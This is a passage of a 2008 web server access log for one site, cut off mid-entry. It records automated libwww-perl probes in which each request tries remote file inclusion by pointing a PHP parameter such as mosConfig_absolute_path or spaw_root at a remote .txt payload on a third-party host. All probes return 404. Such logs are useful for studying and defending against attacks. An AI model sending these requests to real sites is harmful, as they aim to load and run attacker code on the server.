210.245.87.117 - - [26/Jul/2008:05:43:32 -0700] "GET /logs/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:43:39 -0700] "GET /logs/access.log//include/write.php?dir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:43:39 -0700] "GET //include/write.php?dir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:43:39 -0700] "GET /logs//include/write.php?dir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:43:40 -0700] "GET /logs/access_080717.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:43:40 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:43:40 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:43:42 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:43:49 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:44:00 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:44:00 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:44:26 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:44:26 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:44:26 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:44:26 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:44:26 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:44:26 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:44:27 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:44:33 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.freewebs.com/albgroup/1d/Hid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.hellionindustries.com"
213.219.217.44 - - [26/Jul/2008:05:44:33 -0700] "GET /ktmlp